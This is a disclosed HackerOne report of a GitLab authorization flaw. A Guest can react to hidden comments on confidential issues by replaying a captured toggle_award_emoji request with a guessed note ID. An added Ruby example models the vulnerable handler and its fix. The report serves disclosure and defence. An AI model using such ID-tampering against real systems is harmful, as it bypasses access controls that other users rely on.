
Guest can add reaction to comments which are not visible to them

Link:          https://hackerone.com/reports/407425
By:            @ashish_r_padelkar

Details:

Summary:

Hello,

A user with the Guest role in a group cannot add a reaction to any comments which are not visible to them in the group.

Description: A Guest cannot see comments when an issue is confidential, or comments from merge requests, etc. However, if they can correctly guess the ID of the comment, they can send their reactions to it.

Steps To Reproduce:

  1. As a Guest in a group, react to any visible comment first and capture the request below:
POST /Group1ww/NeNeW/notes/99856777/toggle_award_emoji HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 21
Accept: application/json, text/plain, */*
Origin: https://gitlab.com
X-CSRF-Token: +6Q9xzAdYpP76jsCu3QExYbNboI/5NT/siQVoIRa8oO5ecpAY6miy1m6R4zLGuIlc68fqMGCmk6rn+BGGlw8ig==
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://gitlab.com/Group1ww/NeNeW/issues/1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: 1

{"name":"basketball"}
  2. Here 99856777 is the ID of the comment. Replace this ID in the above request with the comment ID of a comment which is not visible to you in the group and send the request:

POST /Group1ww/NeNeW/notes/<CommentID>/toggle_award_emoji HTTP/1.1

  3. Users with access to such comments will then see that the Guest has reacted to the comments, which is not possible otherwise!

Regards, Ashish

Impact

A Guest can react to comments which are not visible to them in a group.
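The report describes a missing object-level authorization check: the reaction endpoint trusts the note ID without asking whether the caller may read that note. The following is an added example, not GitLab's code, modelling that gap and its fix on a minimal in-memory domain; the role ranks, the `visible_to?` rule and the handler names are assumptions, and only the note ID 99856777 comes from the report.

```ruby
# Added example (not GitLab's code): the authorization gap in the report,
# modelled on a minimal in-memory domain. Role ranks, `visible_to?` and the
# handler names are assumptions; only note id 99856777 comes from the report.
require 'set'

ROLE_RANK = { guest: 10, reporter: 20, developer: 30 }.freeze
User  = Struct.new(:name, :role)
Issue = Struct.new(:id, :confidential)
Note  = Struct.new(:id, :issue, :awards) do
  # Guests cannot read notes on confidential issues; the same predicate
  # must gate every write to the note, including reactions.
  def visible_to?(user)
    return true unless issue.confidential
    ROLE_RANK[user.role] >= ROLE_RANK[:reporter]
  end
end

NOTES = {} # constructed in-memory store: note id => Note

def register_note(note)
  NOTES[note.id] = note
end

# Shared toggle logic: add the user's reaction to `emoji`, or remove it if present.
def toggle!(note, user, emoji)
  reacted = (note.awards[emoji] ||= Set.new)
  reacted.include?(user.name) ? reacted.delete(user.name) : reacted.add(user.name)
  { status: 200, reacted: reacted.include?(user.name) }
end

# Vulnerable handler: trusts the client-supplied note id and never asks
# whether the caller may read the note, so a guessed id is enough.
def toggle_award_emoji_vulnerable(user, note_id, emoji)
  toggle!(NOTES.fetch(note_id), user, emoji)
end

# Hardened handler: resolve the note through the caller's visibility rule
# and answer 404 for both missing and hidden notes, so the response does
# not confirm that a hidden note id exists.
def toggle_award_emoji_secure(user, note_id, emoji)
  note = NOTES[note_id]
  return { status: 404, reacted: false } if note.nil? || !note.visible_to?(user)
  toggle!(note, user, emoji)
end

GUEST  = User.new('guest', :guest)
MEMBER = User.new('dev', :developer)
register_note(Note.new(99_856_777, Issue.new(1, false), {})) # visible comment (id from the report)
register_note(Note.new(99_856_778, Issue.new(2, true), {}))  # constructed: comment on a confidential issue
```

Running the hardened handler with the guest against the confidential note returns 404 and records nothing, while the vulnerable handler records the reaction exactly as the report describes.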